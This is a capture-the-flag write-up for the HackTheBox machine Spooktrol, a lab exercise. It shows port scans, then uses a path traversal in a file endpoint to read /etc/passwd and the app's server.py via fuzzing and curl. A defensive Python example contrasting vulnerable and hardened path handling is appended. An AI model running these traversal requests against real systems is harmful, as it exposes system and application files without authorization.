HackTheBox Spooktrol
In this writeup we are going to solve this machine, whose difficulty is very easy.
nmap -sS -Pn -n -vvv -p- --min-rate 5000 10.10.11.123 -oG port
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
Open ports.
nmap -sCV -p22,80,2222 10.10.11.123 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 13:42 EDT
Nmap scan report for 10.10.11.123
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
| 256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_ 256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp open http uvicorn
|_http-server-header: uvicorn
| http-robots.txt: 1 disallowed entry
|_/file_management/?file=implant
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| date: Thu, 13 Mar 2025 17:42:28 GMT
| server: uvicorn
| content-length: 22
| content-type: application/json
| Connection: close
| {"detail":"Not Found"}
| GetRequest:
| HTTP/1.1 200 OK
| date: Thu, 13 Mar 2025 17:42:16 GMT
| server: uvicorn
| content-length: 43
| content-type: application/json
| Connection: close
| {"auth":"16f7da87c8aaa56131785ac05ff1fc68"}
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| date: Thu, 13 Mar 2025 17:42:23 GMT
| server: uvicorn
| content-length: 31
| content-type: application/json
| Connection: close
|_ {"detail":"Method Not Allowed"}
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 16:77:76:8a:65:a3:db:23:11:21:66:6e:e4:c3:f2:32 (RSA)
| 256 61:92:eb:7a:a9:14:d7:60:51:00:0c:44:21:a2:61:08 (ECDSA)
|_ 256 75:c1:96:9c:69:aa:c8:74:ef:4f:72:bd:62:53:e9:4c (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Versions and services running on each open port.
If we browse to /file_management/?file=implant we get the following; we then pass this request through Caido.
We observe that with the file parameter we can read /etc/passwd.
We have the first flag, user.txt.
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://10.10.11.123/file_management/?file=../FUZZ.py' -fc 500
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.123/file_management/?file=../FUZZ.py
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
server [Status: 200, Size: 115, Words: 12, Lines: 5, Duration: 45ms]
Fuzzing filenames with this fuzzer, we find server.py.
curl -s 'http://10.10.11.123/file_management/?file=../server.py'
import uvicorn

if __name__ == "__main__":
    uvicorn.run("app.main:app", host="0.0.0.0", port=8000, reload=True)
A service runs locally on port 8000.
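The reads of /etc/passwd and ../server.py above come from a file-serving endpoint joining the file value onto its directory without checking where the result lands. As an added example (not the box's code, which the page does not show), here is that vulnerable pattern next to a hardened version; the sandbox directory, file names and contents are constructed for the demonstration:

```python
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sandbox standing in for the app's serving directory; the real
# layout of the box is an assumption, since the page only shows server.py.
BASE = Path(tempfile.mkdtemp()) / "app" / "files"
BASE.mkdir(parents=True)
(BASE / "implant").write_bytes(b"constructed implant blob")
# A sibling of the serving directory, mirroring the page's ../server.py read.
(BASE.parent / "server.py").write_text("import uvicorn\n")


def naive_open(name: str) -> bytes:
    """Vulnerable pattern: the request's file value is joined straight onto
    BASE. '..' segments or an absolute path walk out of the directory, which
    is exactly what let the page read ../server.py and /etc/passwd."""
    return (BASE / name).read_bytes()


def safe_open(name: str) -> Optional[bytes]:
    """Hardened pattern: canonicalise the final path (resolving '..' and
    symlinks) and serve it only if it lands strictly inside BASE.
    Returns None for anything rejected, so the caller can answer 404."""
    root = BASE.resolve()
    try:
        target = (BASE / name).resolve()
    except (OSError, ValueError):          # e.g. an embedded NUL byte
        return None
    if root not in target.parents:         # outside BASE, or BASE itself
        return None
    if not target.is_file():
        return None
    return target.read_bytes()


if __name__ == "__main__":
    for value in ("implant", "../server.py", "/etc/passwd"):
        print(f"{value!r}: served={safe_open(value) is not None}")
```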